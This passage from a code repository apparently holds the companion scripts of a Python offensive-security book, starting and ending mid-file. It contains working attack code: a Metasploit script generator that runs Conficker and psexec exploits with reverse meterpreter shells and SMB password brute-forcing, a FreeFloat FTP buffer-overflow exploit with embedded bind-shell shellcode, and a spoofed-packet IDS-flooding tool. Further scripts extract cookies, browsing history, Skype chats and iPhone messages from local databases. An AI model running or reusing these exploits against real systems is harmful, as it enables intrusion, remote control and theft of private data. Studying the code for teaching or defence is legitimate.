lhost + '\n') 39 | configFile.write('exploit -j -z\n') 40 | 41 | 42 | def smbBrute(configFile,tgtHost,passwdFile,lhost,lport): 43 | username = 'Administrator' 44 | pF = open(passwdFile, 'r') 45 | for password in pF.readlines(): 46 | password = password.strip('\n').strip('\r') 47 | configFile.write('use exploit/windows/smb/psexec\n') 48 | configFile.write('set SMBUser ' + str(username) + '\n') 49 | configFile.write('set SMBPass ' + str(password) + '\n') 50 | configFile.write('set RHOST ' + str(tgtHost) + '\n') 51 | configFile.write('set payload '+\ 52 | 'windows/meterpreter/reverse_tcp\n') 53 | configFile.write('set LPORT ' + str(lport) + '\n') 54 | configFile.write('set LHOST ' + lhost + '\n') 55 | configFile.write('exploit -j -z\n') 56 | 57 | 58 | def main(): 59 | configFile = open('meta.rc', 'w') 60 | 61 | parser = optparse.OptionParser('[-] Usage %prog '+\ 62 | '-H -l [-p -F ]') 63 | parser.add_option('-H', dest='tgtHost', type='string',\ 64 | help='specify the target address[es]') 65 | parser.add_option('-p', dest='lport', type='string',\ 66 | help='specify the listen port') 67 | parser.add_option('-l', dest='lhost', type='string',\ 68 | help='specify the listen address') 69 | parser.add_option('-F', dest='passwdFile', type='string',\ 70 | help='password file for SMB brute force attempt') 71 | 72 | (options, args) = parser.parse_args() 73 | 74 | if (options.tgtHost == None) | (options.lhost == None): 75 | print parser.usage 76 | exit(0) 77 | 78 | lhost = options.lhost 79 | lport = options.lport 80 | if lport == None: 81 | lport = '1337' 82 | passwdFile = options.passwdFile 83 | tgtHosts = findTgts(options.tgtHost) 84 | 85 | setupHandler(configFile, lhost, lport) 86 | 87 | for tgtHost in tgtHosts: 88 | confickerExploit(configFile, tgtHost, lhost, lport) 89 | if passwdFile != None: 90 | smbBrute(configFile,tgtHost,passwdFile,lhost,lport) 91 | 92 | configFile.close() 93 | os.system('msfconsole -r meta.rc') 94 | 95 | 96 | if __name__ == '__main__': 97 | main() 98 | -------------------------------------------------------------------------------- /CH2/6-freeFloat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/Python 2 | #Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows 3 | #Author: Craig Freyman (@cd1zz) 4 | #Date: July 19, 2011 5 | #Tested on Windows XP SP3 English 6 | #Part of FreeFloat pwn week 7 | #Vendor Notified: 7-18-2011 (no response) 8 | #Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php 9 | 10 | import socket,sys,time,struct 11 | 12 | if len(sys.argv) < 2: 13 | print "[-]Usage: %s " % sys.argv[0] + "\r" 14 | print "[-]For example [filename.py 192.168.1.10 PWND] would do the trick." 
15 | print "[-]Other options: AUTH, APPE, ALLO, ACCT" 16 | sys.exit(0) 17 | 18 | target = sys.argv[1] 19 | command = sys.argv[2] 20 | 21 | if len(sys.argv) > 2: 22 | platform = sys.argv[2] 23 | 24 | #./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "\x00\xff\x0d\x0a\x3d\x20" 25 | #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) 26 | 27 | shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9" 28 | "\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f" 29 | "\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8" 30 | "\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7" 31 | "\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5" 32 | "\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c" 33 | "\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0" 34 | "\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49" 35 | "\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96" 36 | "\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82" 37 | "\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf" 38 | "\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41" 39 | "\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f" 40 | "\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a" 41 | "\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" 42 | "\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a" 43 | "\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3" 44 | "\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea" 45 | "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8" 46 | "\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6" 47 | "\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea" 48 | "\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" 49 | "\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53" 50 | "\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85" 51 | "\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25" 52 | "\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10" 53 | "\xba\x1e\x53\x31") 54 | 55 | #7C874413 FFE4 JMP ESP kernel32.dll 56 | ret = struct.pack(' -p ') 66 | parser.add_option('-u', dest='username', type='string', 67 | help='specify wigle password') 68 | parser.add_option('-p', dest='password', type='string', 69 | help='specify wigle username') 70 | (options, args) = parser.parse_args() 71 | username = options.username 72 | password = options.password 73 | if username == None or password == None: 74 | print parser.usage 75 | exit(0) 76 | else: 77 | printNets(username, password) 78 | 79 | 80 | if __name__ == '__main__': 81 | main() 82 | -------------------------------------------------------------------------------- /CH3/2-dumpRecycleBin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import os 5 | import optparse 6 | from _winreg import * 7 | 8 | 9 | def sid2user(sid): 10 | try: 11 | key = OpenKey(HKEY_LOCAL_MACHINE, 12 | "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" 13 | + '\\' + sid) 14 | (value, type) = QueryValueEx(key, 'ProfileImagePath') 15 | user = value.split('\\')[-1] 16 | return user 17 | except: 18 | return sid 19 | 20 | 21 | def returnDir(): 22 | dirs=['C:\\Recycler\\','C:\\Recycled\\','C:\\$Recycle.Bin\\'] 23 | for recycleDir in dirs: 24 | if os.path.isdir(recycleDir): 25 | return recycleDir 26 | return None 27 | 28 | 29 | def findRecycled(recycleDir): 30 | dirList = os.listdir(recycleDir) 31 | for sid in 
dirList: 32 | files = os.listdir(recycleDir + sid) 33 | user = sid2user(sid) 34 | print '\n[*] Listing Files For User: ' + str(user) 35 | for file in files: 36 | print '[+] Found File: ' + str(file) 37 | 38 | 39 | def main(): 40 | recycledDir = returnDir() 41 | findRecycled(recycledDir) 42 | 43 | 44 | if __name__ == '__main__': 45 | main() 46 | -------------------------------------------------------------------------------- /CH3/3-pdfRead.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pyPdf 4 | import optparse 5 | from pyPdf import PdfFileReader 6 | 7 | 8 | def printMeta(fileName): 9 | pdfFile = PdfFileReader(file(fileName, 'rb')) 10 | docInfo = pdfFile.getDocumentInfo() 11 | print '[*] PDF MetaData For: ' + str(fileName) 12 | for metaItem in docInfo: 13 | print '[+] ' + metaItem + ':' + docInfo[metaItem] 14 | 15 | 16 | def main(): 17 | parser = optparse.OptionParser('usage %prog "+\ 18 | "-F ') 19 | parser.add_option('-F', dest='fileName', type='string',\ 20 | help='specify PDF file name') 21 | 22 | (options, args) = parser.parse_args() 23 | fileName = options.fileName 24 | if fileName == None: 25 | print parser.usage 26 | exit(0) 27 | else: 28 | printMeta(fileName) 29 | 30 | 31 | if __name__ == '__main__': 32 | main() 33 | -------------------------------------------------------------------------------- /CH3/4-exifFetch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib2 4 | import optparse 5 | from urlparse import urlsplit 6 | from os.path import basename 7 | from bs4 import BeautifulSoup 8 | from PIL import Image 9 | from PIL.ExifTags import TAGS 10 | 11 | 12 | def findImages(url): 13 | print '[+] Finding images on ' + url 14 | urlContent = urllib2.urlopen(url).read() 15 | soup = BeautifulSoup(urlContent) 16 | imgTags = soup.findAll('img') 17 | return imgTags 18 | 19 | 20 | def downloadImage(imgTag): 21 | try: 22 | print '[+] Dowloading image...' 
23 | imgSrc = imgTag['src'] 24 | imgContent = urllib2.urlopen(imgSrc).read() 25 | imgFileName = basename(urlsplit(imgSrc)[2]) 26 | imgFile = open(imgFileName, 'wb') 27 | imgFile.write(imgContent) 28 | imgFile.close() 29 | return imgFileName 30 | except: 31 | return '' 32 | 33 | 34 | def testForExif(imgFileName): 35 | try: 36 | exifData = {} 37 | imgFile = Image.open(imgFileName) 38 | info = imgFile._getexif() 39 | if info: 40 | for (tag, value) in info.items(): 41 | decoded = TAGS.get(tag, tag) 42 | exifData[decoded] = value 43 | exifGPS = exifData['GPSInfo'] 44 | if exifGPS: 45 | print '[*] ' + imgFileName + \ 46 | ' contains GPS MetaData' 47 | except: 48 | pass 49 | 50 | 51 | def main(): 52 | parser = optparse.OptionParser('usage %prog "+\ 53 | "-u ') 54 | parser.add_option('-u', dest='url', type='string', 55 | help='specify url address') 56 | 57 | (options, args) = parser.parse_args() 58 | url = options.url 59 | if url == None: 60 | print parser.usage 61 | exit(0) 62 | else: 63 | imgTags = findImages(url) 64 | for imgTag in imgTags: 65 | imgFileName = downloadImage(imgTag) 66 | testForExif(imgFileName) 67 | 68 | 69 | if __name__ == '__main__': 70 | main() 71 | -------------------------------------------------------------------------------- /CH3/5-skypeParse.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sqlite3 4 | import optparse 5 | import os 6 | 7 | 8 | def printProfile(skypeDB): 9 | conn = sqlite3.connect(skypeDB) 10 | c = conn.cursor() 11 | c.execute("SELECT fullname, skypename, city, country, \ 12 | datetime(profile_timestamp,'unixepoch') FROM Accounts;") 13 | 14 | for row in c: 15 | print '[*] -- Found Account --' 16 | print '[+] User : '+str(row[0]) 17 | print '[+] Skype Username : '+str(row[1]) 18 | print '[+] Location : '+str(row[2])+','+str(row[3]) 19 | print '[+] Profile Date : '+str(row[4]) 20 | 21 | 22 | def printContacts(skypeDB): 23 | conn = sqlite3.connect(skypeDB) 24 | c = conn.cursor() 25 | c.execute("SELECT displayname, skypename, city, country,\ 26 | phone_mobile, birthday FROM Contacts;") 27 | 28 | for row in c: 29 | print '\n[*] -- Found Contact --' 30 | print '[+] User : ' + str(row[0]) 31 | print '[+] Skype Username : ' + str(row[1]) 32 | 33 | if str(row[2]) != '' and str(row[2]) != 'None': 34 | print '[+] Location : ' + str(row[2]) + ',' \ 35 | + str(row[3]) 36 | if str(row[4]) != 'None': 37 | print '[+] Mobile Number : ' + str(row[4]) 38 | if str(row[5]) != 'None': 39 | print '[+] Birthday : ' + str(row[5]) 40 | 41 | 42 | def printCallLog(skypeDB): 43 | conn = sqlite3.connect(skypeDB) 44 | c = conn.cursor() 45 | c.execute("SELECT datetime(begin_timestamp,'unixepoch'), \ 46 | identity FROM calls, conversations WHERE \ 47 | calls.conv_dbid = conversations.id;" 48 | ) 49 | print '\n[*] -- Found Calls --' 50 | 51 | for row in c: 52 | print '[+] Time: '+str(row[0])+\ 53 | ' | Partner: '+ str(row[1]) 54 | 55 | 56 | def printMessages(skypeDB): 57 | conn = sqlite3.connect(skypeDB) 58 | c = conn.cursor() 59 | c.execute("SELECT datetime(timestamp,'unixepoch'), \ 60 | dialog_partner, author, body_xml FROM Messages;") 61 | print '\n[*] -- Found Messages --' 62 | 63 | for row in c: 64 | try: 65 | if 'partlist' not in str(row[3]): 66 | if str(row[1]) != str(row[2]): 67 | msgDirection = 'To ' + str(row[1]) + ': ' 68 | else: 69 | msgDirection = 'From ' + str(row[2]) + ' : ' 70 | print 'Time: ' + str(row[0]) + ' ' \ 71 | + msgDirection + str(row[3]) 72 | except: 73 | pass 74 | 75 
76 | def main():
77 |     parser = optparse.OptionParser("usage %prog "+\
78 |         "-p <skype profile path>")
79 |     parser.add_option('-p', dest='pathName', type='string',\
80 |         help='specify skype profile path')
81 | 
82 |     (options, args) = parser.parse_args()
83 |     pathName = options.pathName
84 |     if pathName == None:
85 |         print parser.usage
86 |         exit(0)
87 |     elif os.path.isdir(pathName) == False:
88 |         print '[!] Path Does Not Exist: ' + pathName
89 |         exit(0)
90 |     else:
91 |         skypeDB = os.path.join(pathName, 'main.db')
92 |         if os.path.isfile(skypeDB):
93 |             printProfile(skypeDB)
94 |             printContacts(skypeDB)
95 |             printCallLog(skypeDB)
96 |             printMessages(skypeDB)
97 |         else:
98 |             print '[!] Skype Database '+\
99 |                 'does not exist: ' + skypeDB
100 | 
101 | 
102 | if __name__ == '__main__':
103 |     main()
104 | 

--------------------------------------------------------------------------------
/CH3/6-firefoxParse.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | 
4 | import re
5 | import optparse
6 | import os
7 | import sqlite3
8 | 
9 | 
10 | def printDownloads(downloadDB):
11 |     conn = sqlite3.connect(downloadDB)
12 |     c = conn.cursor()
13 |     c.execute('SELECT name, source, datetime(endTime/1000000,\
14 |         \'unixepoch\') FROM moz_downloads;'
15 |     )
16 |     print '\n[*] --- Files Downloaded --- '
17 |     for row in c:
18 |         print '[+] File: ' + str(row[0]) + ' from source: ' \
19 |             + str(row[1]) + ' at: ' + str(row[2])
20 | 
21 | 
22 | def printCookies(cookiesDB):
23 |     try:
24 |         conn = sqlite3.connect(cookiesDB)
25 |         c = conn.cursor()
26 |         c.execute('SELECT host, name, value FROM moz_cookies')
27 | 
28 |         print '\n[*] -- Found Cookies --'
29 |         for row in c:
30 |             host = str(row[0])
31 |             name = str(row[1])
32 |             value = str(row[2])
33 |             print '[+] Host: ' + host + ', Cookie: ' + name \
34 |                 + ', Value: ' + value
35 |     except Exception, e:
36 |         if 'encrypted' in str(e):
37 |             print '\n[*] Error reading your cookies database.'
38 |             print '[*] Upgrade your Python-Sqlite3 Library'
39 | 
40 | 
41 | def printHistory(placesDB):
42 |     try:
43 |         conn = sqlite3.connect(placesDB)
44 |         c = conn.cursor()
45 |         c.execute("select url, datetime(visit_date/1000000, \
46 |             'unixepoch') from moz_places, moz_historyvisits \
47 |             where visit_count > 0 and moz_places.id==\
48 |             moz_historyvisits.place_id;")
49 | 
50 |         print '\n[*] -- Found History --'
51 |         for row in c:
52 |             url = str(row[0])
53 |             date = str(row[1])
54 |             print '[+] ' + date + ' - Visited: ' + url
55 |     except Exception, e:
56 |         if 'encrypted' in str(e):
57 |             print '\n[*] Error reading your places database.'
58 | print '[*] Upgrade your Python-Sqlite3 Library' 59 | exit(0) 60 | 61 | 62 | def printGoogle(placesDB): 63 | conn = sqlite3.connect(placesDB) 64 | c = conn.cursor() 65 | c.execute("select url, datetime(visit_date/1000000, \ 66 | 'unixepoch') from moz_places, moz_historyvisits \ 67 | where visit_count > 0 and moz_places.id==\ 68 | moz_historyvisits.place_id;") 69 | 70 | print '\n[*] -- Found Google --' 71 | for row in c: 72 | url = str(row[0]) 73 | date = str(row[1]) 74 | if 'google' in url.lower(): 75 | r = re.findall(r'q=.*\&', url) 76 | if r: 77 | search=r[0].split('&')[0] 78 | search=search.replace('q=', '').replace('+', ' ') 79 | print '[+] '+date+' - Searched For: ' + search 80 | 81 | 82 | def main(): 83 | parser = optparse.OptionParser("usage %prog "+\ 84 | "-p " 85 | ) 86 | parser.add_option('-p', dest='pathName', type='string',\ 87 | help='specify skype profile path') 88 | 89 | (options, args) = parser.parse_args() 90 | pathName = options.pathName 91 | if pathName == None: 92 | print parser.usage 93 | exit(0) 94 | elif os.path.isdir(pathName) == False: 95 | print '[!] Path Does Not Exist: ' + pathName 96 | exit(0) 97 | else: 98 | 99 | downloadDB = os.path.join(pathName, 'downloads.sqlite') 100 | if os.path.isfile(downloadDB): 101 | printDownloads(downloadDB) 102 | else: 103 | print '[!] Downloads Db does not exist: '+downloadDB 104 | 105 | cookiesDB = os.path.join(pathName, 'cookies.sqlite') 106 | if os.path.isfile(cookiesDB): 107 | pass 108 | printCookies(cookiesDB) 109 | else: 110 | print '[!] Cookies Db does not exist:' + cookiesDB 111 | 112 | placesDB = os.path.join(pathName, 'places.sqlite') 113 | if os.path.isfile(placesDB): 114 | printHistory(placesDB) 115 | printGoogle(placesDB) 116 | else: 117 | print '[!] PlacesDb does not exist: ' + placesDB 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | 123 | -------------------------------------------------------------------------------- /CH3/7-iphoneMessages.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sqlite3 5 | import optparse 6 | 7 | 8 | def isMessageTable(iphoneDB): 9 | try: 10 | conn = sqlite3.connect(iphoneDB) 11 | c = conn.cursor() 12 | c.execute('SELECT tbl_name FROM sqlite_master \ 13 | WHERE type==\"table\";') 14 | for row in c: 15 | if 'message' in str(row): 16 | return True 17 | except: 18 | return False 19 | 20 | 21 | def printMessage(msgDB): 22 | try: 23 | conn = sqlite3.connect(msgDB) 24 | c = conn.cursor() 25 | c.execute('select datetime(date,\'unixepoch\'),\ 26 | address, text from message WHERE address>0;') 27 | for row in c: 28 | date = str(row[0]) 29 | addr = str(row[1]) 30 | text = row[2] 31 | print '\n[+] Date: '+date+', Addr: '+addr \ 32 | + ' Message: ' + text 33 | except: 34 | pass 35 | 36 | 37 | def main(): 38 | parser = optparse.OptionParser("usage %prog "+\ 39 | "-p ") 40 | parser.add_option('-p', dest='pathName',\ 41 | type='string',help='specify skype profile path') 42 | (options, args) = parser.parse_args() 43 | 44 | pathName = options.pathName 45 | if pathName == None: 46 | print parser.usage 47 | exit(0) 48 | else: 49 | dirList = os.listdir(pathName) 50 | for fileName in dirList: 51 | iphoneDB = os.path.join(pathName, fileName) 52 | if isMessageTable(iphoneDB): 53 | try: 54 | print '\n[*] --- Found Messages ---' 55 | printMessage(iphoneDB) 56 | except: 57 | pass 58 | 59 | 60 | if __name__ == '__main__': 61 | main() 62 | 
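All of the CH3 forensic scripts follow the same pattern: connect to a SQLite file, query a known table, and print the rows. A reusable sketch of the discovery step that 7-iphoneMessages.py performs with isMessageTable (the 'main.db' path is a placeholder):

import sqlite3

def list_tables(db_file):
    # sqlite_master catalogs every table defined in the database file
    conn = sqlite3.connect(db_file)
    rows = conn.execute("SELECT tbl_name FROM sqlite_master WHERE type='table';")
    return [row[0] for row in rows]

print(list_tables('main.db'))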
-------------------------------------------------------------------------------- /CH3/firefox_profile.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH3/firefox_profile.zip -------------------------------------------------------------------------------- /CH3/skype_profile.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH3/skype_profile.zip -------------------------------------------------------------------------------- /CH4/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/.DS_Store -------------------------------------------------------------------------------- /CH4/1-geoIP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pygeoip 4 | gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat') 5 | 6 | 7 | def printRecord(tgt): 8 | rec = gi.record_by_name(tgt) 9 | city = rec['city'] 10 | region = rec['region_name'] 11 | country = rec['country_name'] 12 | long = rec['longitude'] 13 | lat = rec['latitude'] 14 | print '[*] Target: ' + tgt + ' Geo-located. ' 15 | print '[+] '+str(city)+', '+str(region)+', '+str(country) 16 | print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long) 17 | 18 | 19 | tgt = '173.255.226.98' 20 | printRecord(tgt) 21 | 22 | -------------------------------------------------------------------------------- /CH4/10-idsFoil.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from scapy.all import * 3 | from random import randint 4 | 5 | 6 | def ddosTest(src, dst, iface, count): 7 | pkt=IP(src=src,dst=dst)/ICMP(type=8,id=678)/Raw(load='1234') 8 | send(pkt, iface=iface, count=count) 9 | 10 | pkt = IP(src=src,dst=dst)/ICMP(type=0)/Raw(load='AAAAAAAAAA') 11 | send(pkt, iface=iface, count=count) 12 | 13 | pkt = IP(src=src,dst=dst)/UDP(dport=31335)/Raw(load='PONG') 14 | send(pkt, iface=iface, count=count) 15 | 16 | pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456) 17 | send(pkt, iface=iface, count=count) 18 | 19 | 20 | def exploitTest(src, dst, iface, count): 21 | 22 | pkt = IP(src=src, dst=dst) / UDP(dport=518) \ 23 | /Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8") 24 | send(pkt, iface=iface, count=count) 25 | 26 | pkt = IP(src=src, dst=dst) / UDP(dport=635) \ 27 | /Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F") 28 | send(pkt, iface=iface, count=count) 29 | 30 | 31 | def scanTest(src, dst, iface, count): 32 | pkt = IP(src=src, dst=dst) / UDP(dport=7) \ 33 | /Raw(load='cybercop') 34 | send(pkt) 35 | 36 | pkt = IP(src=src, dst=dst) / UDP(dport=10080) \ 37 | /Raw(load='Amanda') 38 | send(pkt, iface=iface, count=count) 39 | 40 | 41 | def main(): 42 | parser = optparse.OptionParser('usage %prog '+\ 43 | '-i -s -t -c ' 44 | ) 45 | parser.add_option('-i', dest='iface', type='string',\ 46 | help='specify network interface') 47 | parser.add_option('-s', dest='src', type='string',\ 48 | help='specify source address') 49 | parser.add_option('-t', dest='tgt', type='string',\ 50 | help='specify target address') 51 | parser.add_option('-c', dest='count', 
        type='int',\
52 |         help='specify packet count')
53 | 
54 |     (options, args) = parser.parse_args()
55 |     if options.iface == None:
56 |         iface = 'eth0'
57 |     else:
58 |         iface = options.iface
59 |     if options.src == None:
60 |         src = '.'.join([str(randint(1,254)) for x in range(4)])
61 |     else:
62 |         src = options.src
63 |     if options.tgt == None:
64 |         print parser.usage
65 |         exit(0)
66 |     else:
67 |         dst = options.tgt
68 |     if options.count == None:
69 |         count = 1
70 |     else:
71 |         count = options.count
72 | 
73 |     ddosTest(src, dst, iface, count)
74 |     exploitTest(src, dst, iface, count)
75 |     scanTest(src, dst, iface, count)
76 | 
77 | 
78 | if __name__ == '__main__':
79 |     main()
80 | 
81 | 

--------------------------------------------------------------------------------
/CH4/2-printDirection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import dpkt
4 | import socket
5 | 
6 | 
7 | def printPcap(pcap):
8 |     for (ts, buf) in pcap:
9 |         try:
10 |             eth = dpkt.ethernet.Ethernet(buf)
11 |             ip = eth.data
12 |             src = socket.inet_ntoa(ip.src)
13 |             dst = socket.inet_ntoa(ip.dst)
14 |             print '[+] Src: ' + src + ' --> Dst: ' + dst
15 |         except:
16 |             pass
17 | 
18 | 
19 | def main():
20 |     f = open('geotest.pcap')
21 |     pcap = dpkt.pcap.Reader(f)
22 |     printPcap(pcap)
23 | 
24 | 
25 | if __name__ == '__main__':
26 |     main()
27 | 
28 | 

--------------------------------------------------------------------------------
/CH4/3-geoPrint.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import dpkt
4 | import socket
5 | import pygeoip
6 | import optparse
7 | gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')
8 | 
9 | 
10 | def retGeoStr(ip):
11 |     try:
12 |         rec = gi.record_by_name(ip)
13 |         city = rec['city']
14 |         country = rec['country_code3']
15 |         if city != '':
16 |             geoLoc = city + ', ' + country
17 |         else:
18 |             geoLoc = country
19 |         return geoLoc
20 |     except Exception, e:
21 |         return 'Unregistered'
22 | 
23 | 
24 | def printPcap(pcap):
25 |     for (ts, buf) in pcap:
26 |         try:
27 |             eth = dpkt.ethernet.Ethernet(buf)
28 |             ip = eth.data
29 |             src = socket.inet_ntoa(ip.src)
30 |             dst = socket.inet_ntoa(ip.dst)
31 |             print '[+] Src: ' + src + ' --> Dst: ' + dst
32 |             print '[+] Src: ' + retGeoStr(src) + '--> Dst: ' \
33 |                 + retGeoStr(dst)
34 |         except:
35 |             pass
36 | 
37 | 
38 | def main():
39 |     parser = optparse.OptionParser('usage %prog -p <pcapfile>')
40 |     parser.add_option('-p', dest='pcapFile', type='string',\
41 |         help='specify pcap filename')
42 |     (options, args) = parser.parse_args()
43 |     if options.pcapFile == None:
44 |         print parser.usage
45 |         exit(0)
46 |     pcapFile = options.pcapFile
47 |     f = open(pcapFile)
48 |     pcap = dpkt.pcap.Reader(f)
49 |     printPcap(pcap)
50 | 
51 | 
52 | if __name__ == '__main__':
53 |     main()
54 | 
55 | 

--------------------------------------------------------------------------------
/CH4/4-googleEarthPcap.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import dpkt
4 | import socket
5 | import pygeoip
6 | import optparse
7 | gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')
8 | 
9 | 
10 | def retKML(ip):
11 |     rec = gi.record_by_name(ip)
12 |     try:
13 |         longitude = rec['longitude']
14 |         latitude = rec['latitude']
15 |         kml = (
16 |             '<Placemark>\n'
17 |             '<name>%s</name>\n'
18 |             '<Point>\n'
19 |             '<coordinates>%6f,%6f</coordinates>\n'
20 |             '</Point>\n'
21 |             '</Placemark>\n'
22 |         ) %(ip,longitude, latitude)
23 |         return kml
24 |     except:
25 |         return ''
26 | 
27 | 
28 | def plotIPs(pcap):
29 |     kmlPts = ''
30 |     for (ts, buf) in pcap:
31 |         try:
32 |             eth = dpkt.ethernet.Ethernet(buf)
33 |             ip = eth.data
34 |             src = socket.inet_ntoa(ip.src)
35 |             srcKML = retKML(src)
36 |             dst = socket.inet_ntoa(ip.dst)
37 |             dstKML = retKML(dst)
38 |             kmlPts = kmlPts + srcKML + dstKML
39 |         except:
40 |             pass
41 |     return kmlPts
42 | 
43 | 
44 | def main():
45 |     parser = optparse.OptionParser('usage %prog -p <pcapfile>')
46 |     parser.add_option('-p', dest='pcapFile', type='string',\
47 |         help='specify pcap filename')
48 |     (options, args) = parser.parse_args()
49 |     if options.pcapFile == None:
50 |         print parser.usage
51 |         exit(0)
52 |     pcapFile = options.pcapFile
53 |     f = open(pcapFile)
54 |     pcap = dpkt.pcap.Reader(f)
55 | 
56 |     kmlheader = '<?xml version="1.0" encoding="UTF-8"?>'+\
57 |         '\n<kml xmlns="http://www.opengis.net/kml/2.2">\n<Document>\n'
58 |     kmlfooter = '</Document>\n</kml>\n'
59 |     kmldoc=kmlheader+plotIPs(pcap)+kmlfooter
60 |     print kmldoc
61 | 
62 | 
63 | if __name__ == '__main__':
64 |     main()
65 | 
66 | 

--------------------------------------------------------------------------------
/CH4/5-findDDoS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import dpkt
4 | import optparse
5 | import socket
6 | THRESH = 1000
7 | 
8 | 
9 | def findDownload(pcap):
10 |     for (ts, buf) in pcap:
11 |         try:
12 |             eth = dpkt.ethernet.Ethernet(buf)
13 |             ip = eth.data
14 |             src = socket.inet_ntoa(ip.src)
15 |             tcp = ip.data
16 |             http = dpkt.http.Request(tcp.data)
17 |             if http.method == 'GET':
18 |                 uri = http.uri.lower()
19 |                 if '.zip' in uri and 'loic' in uri:
20 |                     print '[!] ' + src + ' Downloaded LOIC.'
21 |         except:
22 |             pass
23 | 
24 | 
25 | def findHivemind(pcap):
26 |     for (ts, buf) in pcap:
27 |         try:
28 |             eth = dpkt.ethernet.Ethernet(buf)
29 |             ip = eth.data
30 |             src = socket.inet_ntoa(ip.src)
31 |             dst = socket.inet_ntoa(ip.dst)
32 |             tcp = ip.data
33 |             dport = tcp.dport
34 |             sport = tcp.sport
35 |             if dport == 6667:
36 |                 if '!lazor' in tcp.data.lower():
37 |                     print '[!] DDoS Hivemind issued by: '+src
38 |                     print '[+] Target CMD: ' + tcp.data
39 |             if sport == 6667:
40 |                 if '!lazor' in tcp.data.lower():
41 |                     print '[!] DDoS Hivemind issued to: '+src
42 |                     print '[+] Target CMD: ' + tcp.data
43 |         except:
44 |             pass
45 | 
46 | 
47 | def findAttack(pcap):
48 |     pktCount = {}
49 |     for (ts, buf) in pcap:
50 |         try:
51 |             eth = dpkt.ethernet.Ethernet(buf)
52 |             ip = eth.data
53 |             src = socket.inet_ntoa(ip.src)
